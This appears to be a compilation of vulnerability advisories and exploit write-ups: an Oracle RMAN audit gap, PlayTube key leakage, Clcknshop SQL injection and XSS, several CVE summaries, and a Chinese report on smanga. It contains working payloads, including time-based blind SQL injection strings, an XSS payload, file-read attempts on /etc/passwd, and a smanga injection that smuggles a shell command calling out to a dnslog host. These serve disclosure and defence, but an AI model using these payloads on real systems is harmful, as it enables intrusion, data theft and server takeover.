Proof of concept exploit for Oracle RMAN on Oracle database versions 19c, 18c, 12.2.0.1, and 12.1.0.2 where an RMAN controlfile operation is not adequately logged.

    Title: CVE-2021-2207 - RMAN Controlfile Operation Not AuditedProduct:                   DatabaseManufacturer:              OracleAffected Version(s):       12.1.0.2, 12.2.0.1, 18c, 19cTested Version(s):         19cRisk Level:                lowScore:                     2.3Solution Status:           FixedCVE Reference:             CVE-2021-2207Author of Advisory:        Emad Al-MousaOverview:Audit failure is a security weakness in software product especially if a security audit is in-place to detect a certain operation. Oracle RMAN isa database Recovery Manager utility for backup and restore operations, so any security weakness/vulnerability can be exploited by insider threat orexternal attacker to view confidential data in unauthorized manner.*****************************************Vulnerability Details:oracle database controlfile restore is not logged in unified auditing logs*****************************************Proof of Concept (PoC):In this simulation, unified auditing logs the backup of controlfile successfully while restore operation was not as shown below:rman target /RMAN> backup current controlfile;RMAN> restore controlfile to '/tmp/emad_ctl.ctl';Querying Unified Audit logs:SQL> select audit_type,client_program_name,event_timestamp,rman_operation,rman_object_type,rman_device_type from unified_audit_trail where audit_type like 'RMAN%'' order by event_timestamp desc;control file backup was recorded under RMAN_OBJECT_TYPE column while restore operation was logged, but it was not clear for which database object….in our case its the controlfile !*****************************************References:https://www.oracle.com/security-alerts/cpuapr2021.htmlhttps://databasesecurityninja.wordpress.com/2023/09/01/cve-2021-2207-rman-controlfile-operation-not-audited/

Oracle RMAN Missing Auditing

PlayTube version 3.0.1 suffers from an information leakage vulnerability.

    # Exploit Title: PlayTube 3.0.1 - Redirect Information Disclosure# Exploit Author: CraCkEr# Date: 19/08/2023# Vendor: PlayTube# Vendor Homepage: https://playtubescript.com/# Software Link: https://demo.playtubescript.com/# Tested on: Windows 10 Pro# Impact: Sensitive Information Leakage# CVE: CVE-2023-4714# CWE: CWE-200 - CWE-284 - CWE-266## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionInformation disclosure issue in the redirect responses, When accessing any page on the website,Sensitive data, such as app IDs, is being exposed in the body of these redirects.## Steps to Reproduce:When you visit most of pages on the website, such as the index page for example:https://website/in the body page response there's information leakage for "RazorPay Payment" id KEY+--------------------------------------+razorpay_options = {          key: "rzp_test_ruz***********"+--------------------------------------+Note: The same information leaked, for the app ID KEY, was added to the "Payment Configuration" in the Administration PanelSettings of "Payment Configuration" in the Administration Panel, on this Path:https://website/admin-cp/payment-settings[-] Done

PlayTube 3.0.1 Information Disclosure

Clcknshop version 1.0.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Clcknshop 1.0.0 - SQL Injection# Exploit Author: CraCkEr# Date: 16/08/2023# Vendor: Infosoftbd Solutions# Vendor Homepage: https://infosoftbd.com/# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/# Demo: https://kidszone.clckn.shop/# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4708# CWE: CWE-89 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /collection/allGET parameter 'tag' is vulnerable to SQL Injectionhttps://website/collection/all?tag=[SQLi]---Parameter: tag (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z---[-] Done

Clcknshop 1.0.0 SQL Injection

Clcknshop version 1.0.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Clcknshop 1.0.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 16/08/2023# Vendor: Infosoftbd Solutions# Vendor Homepage: https://infosoftbd.com/# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/# Demo: https://kidszone.clckn.shop/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4707# CWE: CWE-79 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /collection/allGET parameter 'q' is vulnerable to XSShttps://website/collection/all?q=[XSS]XSS Payloads:jkhrt<script>alert(1)</script>ccnsi[-] Done

Clcknshop 1.0.0 Cross Site Scripting

A vulnerability, which was classified as critical, was found in Xintian Smart Table Integrated Management System 5.6.9. This affects an unknown part of the file /SysManage/AddUpdateRole.aspx. The manipulation of the argument txtRoleName leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-238575. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-4712

A vulnerability has been found in IBOS OA 4.5.5 and classified as critical. This vulnerability affects the function addComment of the file ?r=weibo/comment/addcomment. The manipulation of the argument touid leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-238576. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-4713

SQL injection vulnerability in DataEase v.1.18.9 allows a remote attacker to obtain sensitive information via a crafted string outside of the blacklist function.

**DataEase vulnerable to SQL injection**

High severity GitHub Reviewed Published Sep 1, 2023 to the GitHub Advisory Database • Updated Sep 1, 2023

GHSA-8rv7-g772-pp3j: DataEase vulnerable to SQL injection

A vulnerability was found in Infosoftbd Clcknshop 1.0.0. It has been rated as critical. This issue affects some unknown processing of the file /collection/all of the component GET Parameter Handler. The manipulation of the argument tag leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-238571. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE-2023-4708

SQL Injection vulnerability in Chamilo LMS v.1.11 thru v.1.11.20 allows a remote privileged attacker to obtain sensitive information via the import sessions functions.

CVE-2023-39582: Security issues - Chamilo LMS

SQL Injection vulnerability in smanga version 3.1.9 and earlier, allows remote attackers to execute arbitrary code and gain sensitive information via mediaId, mangaId, and userId parameters in php/history/add.php.

**测试环境说明**

*   版本：3.2.7（最新版）
*   环境：docker

docker搭建所使用的命令：

    docker run -itd --name smanga \
    -p 3333:3306 \
    -p 8097:80 \
    -v /mnt:/mnt \
    -v /route/smanga:/data \
    -v /route/compress:/compress \
    lkw199711/smanga;
    

**1、未授权远程代码执行**

*   漏洞描述

**/php/manga/delete.php**接口处存在未授权远程代码执行漏洞，攻击者可在目标主机执行任意命令，获取服务器权限。

Payload：

    mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";ping -c 3 `whoami`.357efab8.dns.dnsmap.org.;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true
    

*   漏洞复现

payload中触发RCE的是第5个联合查询项，执行命令会先获取服务器用户名并携带用户名信息往dnslog域名发送icmp包，测试成功收到dnslog记录，且获取回显信息。

 

*   漏洞原理  
    payload中通过sql联合查询拼接自己构造的查询项，构造第5个查询项为命令注入点，即mangaPath的值，程序中删除逻辑没有对参数进行过滤，直接使用rm -rf拼接mangaPath删除，造成了命令注入。

其中拼接sql语句的select方法中使用where方法将每个条件进行and分割，干扰了正常union查询的构造，所以不使用逗号，而使用join的形式绕过。

**2、未授权SQL注入**

*   漏洞描述

**补充说明：类似的位置还有很多，均是没有对参数点进行过滤，造成多种类型的SQL注入，修复时可参考一并修复。**

**php/history/add.php**接口处没有对mediaId、mangaId和userId三个参数进行过滤，导致拼接任意sql命令，造成sql注入，未授权的攻击者可获取数据库权限。

*   漏洞复现

使用基于时间的盲注测试mediaId接口。  
构造Payload分别为sleep 6秒和3秒，成功满足预期效果。

    if(now()=sysdate()%2Csleep(3)%2C0)
    

    if(now()=sysdate()%2Csleep(6)%2C0)
    

使用sqlmap利用测试，成功获取数据库名：

*   漏洞原理

sql语句查询没有对接收的参数进行过滤。

**3、未授权任意文件读取**

*   漏洞描述

**/php/get-file-flow.php**接口处file参数没有进行过滤，存在路径遍历，造成任意文件读取漏洞，未授权的攻击者可读取配置文件。

*   漏洞复现

尝试读取/etc/passwd

尝试读取config.ini

*   漏洞原理

没有对file参数进行过滤，导致任意文件读取。

Tag

#sql